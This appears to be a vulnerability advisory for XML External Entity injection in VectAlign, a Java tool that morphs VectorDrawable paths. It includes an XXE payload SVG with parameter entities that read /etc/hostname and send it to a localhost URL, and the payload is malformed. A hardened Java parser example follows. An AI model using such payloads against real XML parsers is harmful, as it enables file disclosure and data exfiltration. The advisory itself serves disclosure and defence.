vulnerability xxe
severity 7.3
language java
registry other


VectAlign (a.k.a. VectorDrawableAlign) is a developer's tool which automagically aligns two VectorDrawable "pathData" strings (or SVG images) in order to allow morphing animations between them using an AnimatedVectorDrawable. This package is vulnerable to XML External Entity (XXE) injection.

:recycle: Steps To Reproduce:

  1. Download and run the tool.
  2. Create a payload SVG, or use the dd.svg example below (this is an example of external XML entity inclusion).

The example dd.svg looks like:

```xml
<!DOCTYPE svg [
<!ENTITY % sp SYSTEM "http://localhost:8080/d.xml">
<svg viewBox="0 0 200 200" version="1.2" xmlns="" style="fill:red">
      <text x="15" y="100" style="fill:black">XXE via SVG rasterization</text>
      <rect x="0" y="0" rx="10" ry="10" width="200" height="200" style="fill:pink;opacity:0.7"/>
      <flowRoot font-size="15">
           <rect x="0" y="0" width="200" height="200" style="fill:red;opacity:0.3"/>

<!ENTITY % data SYSTEM "file:///etc/hostname">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://localhost:8080/s.l?=%data;'>">
```

:male_detective: POC


💥 Impact

Denial of service (DoS), local file inclusion (LFI, as in the POC) and remote code execution (RCE).
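For comparison, this is how a Java SVG loader should configure its XML parser so that a DTD-bearing document like dd.svg is refused before any entity is resolved. It is an added example, not VectAlign's own code; the class name, the feature set and the constructed sample strings are assumptions.

```java
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.w3c.dom.Document;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import java.io.IOException;
import java.io.StringReader;

/** Hardened DOM loader for untrusted SVG input (added example, not part of VectAlign). */
public final class SafeSvgLoader {

    /** Builds a DocumentBuilder that refuses DTDs and external entities outright. */
    static DocumentBuilder hardenedBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Reject any <!DOCTYPE ...> up front: this alone blocks classic and parameter-entity XXE.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Defence in depth in case a DTD is ever allowed again.
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    /** Parses an SVG string; returns null (and logs) when the document is rejected. */
    static Document parse(String svg) throws ParserConfigurationException {
        try {
            return hardenedBuilder().parse(new InputSource(new StringReader(svg)));
        } catch (SAXException | IOException e) {
            // A DOCTYPE in user-supplied SVG is a red flag worth logging, not silently ignoring.
            System.err.println("rejected SVG input: " + e.getMessage());
            return null;
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a harmless SVG, and the same SVG with a DTD prepended.
        String benign = "<svg xmlns=\"http://www.w3.org/2000/svg\"><path d=\"M0 0L10 10\"/></svg>";
        String withDtd = "<!DOCTYPE svg [<!ENTITY x \"placeholder\">]>" + benign;
        System.out.println("benign parsed: " + (parse(benign) != null));
        System.out.println("DTD rejected:  " + (parse(withDtd) == null));
    }
}
```

Run with `java SafeSvgLoader.java` on JDK 11 or later; the first line prints true because the plain SVG parses, the second prints true because the DOCTYPE triggers a SAXException before any entity is fetched.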